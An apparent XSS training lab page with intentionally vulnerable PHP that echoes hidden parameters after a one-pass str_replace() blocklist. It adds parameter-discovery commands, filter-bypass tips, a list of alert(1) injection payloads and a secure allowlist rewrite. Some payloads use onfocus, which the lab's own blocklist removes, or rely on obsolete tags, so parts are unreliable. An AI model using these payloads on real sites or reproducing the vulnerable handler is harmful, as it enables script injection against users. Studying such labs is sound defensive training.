Advanced Hidden Parameter XSS Lab

Discover multiple hidden parameters and bypass advanced filtering

Advanced Hidden Parameter Challenge

Lab Overview

This lab contains multiple hidden parameters with advanced filtering. The visible form uses secure HTML encoding, but there are several hidden endpoints with more complex filtering.

Visible Challenge: Basic HTML encoding using htmlspecialchars() for both first name and last name parameters.
Hidden Parameters: There are multiple hidden parameters that are not shown in the form. Use tools like Arjun to discover them!
Hidden parameter names: id, cat, page, number, page_id, categoryid
Advanced Filter: Complex string replacement that removes multiple dangerous strings and obfuscation attempts
Blocked strings include:
  • script
  • alert
  • confirm
  • prompt
  • eval
  • img
  • svg
  • onfocus
  • ontoggle
  • onmousemove
  • onmouseover
The blocklist also targets case variations, hex encoding and Unicode escapes of these strings.
Filter method: str_replace($arr, '', $_GET['parameter']) with extensive blocklist
Filter Complexity: Advanced String Replacement

Objective: Discover the hidden parameters and bypass the advanced filter to execute XSS.

Backend Source Code
// Visible form: both fields are HTML-encoded before being echoed.
if (isset($_GET["fname"]) && isset($_GET["lname"])) {
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Hidden parameter: a blocklist is stripped with a single str_replace()
// pass and the result is echoed without any output encoding.
elseif (isset($_GET["id"])) {
    // Blocklist as used by the lab (several entries are duplicated).
    $arr = array(
        'details', 'alert', 'confirm', 'prompt', 'eval', 'details',
        'ontoggle', 'onmousemove', 'onmouseover',
        'script', 'Script', 'sCript', 'scRipt', 'scrIpt', 'scriPt', 'scripT',
        'SCript', 'SCRipt', 'SCRIpt', 'SCRIPt', 'SCRIPT', 'script',
        'img', 'image', 'svg', 'onfocus',
        '"c"+"onfirm(1)">', '"co"+"nfirm(1)">', '"con"+"firm(1)">',
        '"conf"+"irm(1)">', '"confi"+"rm(1)">', '"confir"+"m(1)">',
        '"confirm"+"(1)">', '"c"+"o"+"n"+"f"+"i"+"r"+"m"+"(1)">',
        "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>",
        "confirm(1)>", "confirm(1)>", "confirm(1)>", "confirm(1)>",
        "\u0063onfirm(1)>", "c\u006fnfirm(1)>", "co\u006efirm(1)>",
        "con\u0066irm(1)>", "conf\u0069rm(1)>", "confi\u0072m(1)>",
        "confir\u006d(1)>", "\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)>"
    );
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
// Similar code for cat, page, number, page_id, categoryid
// Use the Arjun tool to find the hidden parameters
Test Input Forms
Challenge 1: HTML Encoding (Visible)
First name and last name fields: both use htmlspecialchars() encoding

Challenge 2: Hidden Parameters
Hint: There are multiple parameter names not shown in the form. You need to discover them using parameter discovery tools.
Hidden parameter names: id, cat, page, number, page_id, categoryid
These parameters use advanced filtering with an extensive blocklist
Parameter Discovery & Bypass Techniques
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com
  • ParamSpider: python3 paramspider.py -d example.com
  • FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
  • Manual testing: Try common parameter names like: id, page, view, search, q, s, item, product, cat, category, number, etc.
Bypass Techniques for Advanced Filter:
  • Alternative tags: Use <iframe>, <object>, <embed>
  • Alternative events: Use onload, onerror, onclick
  • Encoding: Try different encoding methods not in the filter
  • Template literals: Use ${alert(1)} in certain contexts
  • Uncommon tags: Try <marquee>, <audio>, <video>
Security Implications

This lab demonstrates:

  • Multiple hidden parameters create complex attack surfaces
  • Advanced filters can still have bypasses
  • Blocklist-based filtering is inherently incomplete
  • Parameter discovery is critical for comprehensive security testing
  • Different parameters may have different security implementations
  • Complex filters can create false sense of security
Best Practices

For secure web applications:

  • Use allowlist-based validation instead of blocklists
  • Implement context-aware output encoding
  • Use Content Security Policy (CSP) headers
  • Conduct thorough parameter discovery during testing
  • Document all API endpoints and parameters
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
  • Regularly update and test security controls
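The first two practices applied to this lab's hidden-parameter handler, as an added example that is not the lab's own code. It assumes the hidden parameters (id, cat, page, number, page_id, categoryid) are meant to carry numeric identifiers, and it uses PHP's filter_var() and htmlspecialchars() in place of the str_replace() blocklist:

```php
<?php
// Added example, not the lab's own code: the hidden-parameter handler
// rebuilt on allowlist validation plus context-aware output encoding.
// Assumption: every hidden parameter is a non-negative integer
// identifier; adapt the rule per parameter if a real application
// differs. Nothing is "cleaned" with str_replace(); bad input is
// rejected and only trusted or encoded text is ever reflected.

const HIDDEN_PARAMS = ['id', 'cat', 'page', 'number', 'page_id', 'categoryid'];

// Allowlist check: return the integer value, or null if the input is
// anything other than a plain non-negative integer (tags, quotes,
// escapes and negative numbers all fail here, no blocklist needed).
function validateHiddenParam(string $value): ?int
{
    $options = ['options' => ['min_range' => 0, 'max_range' => PHP_INT_MAX]];
    $int = filter_var($value, FILTER_VALIDATE_INT, $options);
    return $int === false ? null : $int;
}

// Context-aware output encoding for an HTML body or quoted attribute,
// the same call the visible fname/lname fields already use.
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Replacement for the elseif (isset($_GET["id"])) branch: a rejected
// value yields an error message, never an echo of the raw input.
function handleHiddenParams(array $get): string
{
    foreach (HIDDEN_PARAMS as $name) {
        if (!isset($get[$name])) {
            continue;
        }
        $id = validateHiddenParam((string) $get[$name]);
        if ($id === null) {
            // Only the parameter name (from our own list) is reflected,
            // and it still passes through the encoder.
            return 'Invalid value for ' . encodeForHtml($name);
        }
        return "Selected $name: $id";
    }
    return 'No hidden parameter supplied';
}

// Constructed sample requests (not real traffic) for a CLI run.
foreach ([['id' => '42'], ['cat' => '-1'], ['page' => '<b>1</b>'], ['number' => 'x']] as $get) {
    echo handleHiddenParams($get), PHP_EOL;
}
```

Only the first sample is accepted; the other three are refused before anything reaches the page, so the blocklist and its many spelling variants are no longer needed.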
Payload Examples for Advanced Filter
Alternative Tag Vectors:
  • <iframe src="javascript:alert(1)">
  • <object data="javascript:alert(1)">
  • <embed src="javascript:alert(1)">
  • <base href="javascript:alert(1)//">
  • <form action="javascript:alert(1)"><input type=submit>
Alternative Event Handlers:
  • <body onload=alert(1)>
  • <input onfocus=alert(1) autofocus>
  • <select onfocus=alert(1) autofocus>
  • <textarea onfocus=alert(1) autofocus>
  • <keygen onfocus=alert(1) autofocus>
Advanced Bypass Techniques:
  • <marquee onstart=alert(1)> - Marquee tag with onstart
  • <audio src=x onerror=alert(1)> - Audio tag
  • <video src=x onerror=alert(1)> - Video tag
  • <applet code="javascript:alert(1)"> - Applet tag
  • <isindex type=image src=1 onerror=alert(1)> - Isindex tag
  • <button onfocus=alert(1) autofocus> - Button with autofocus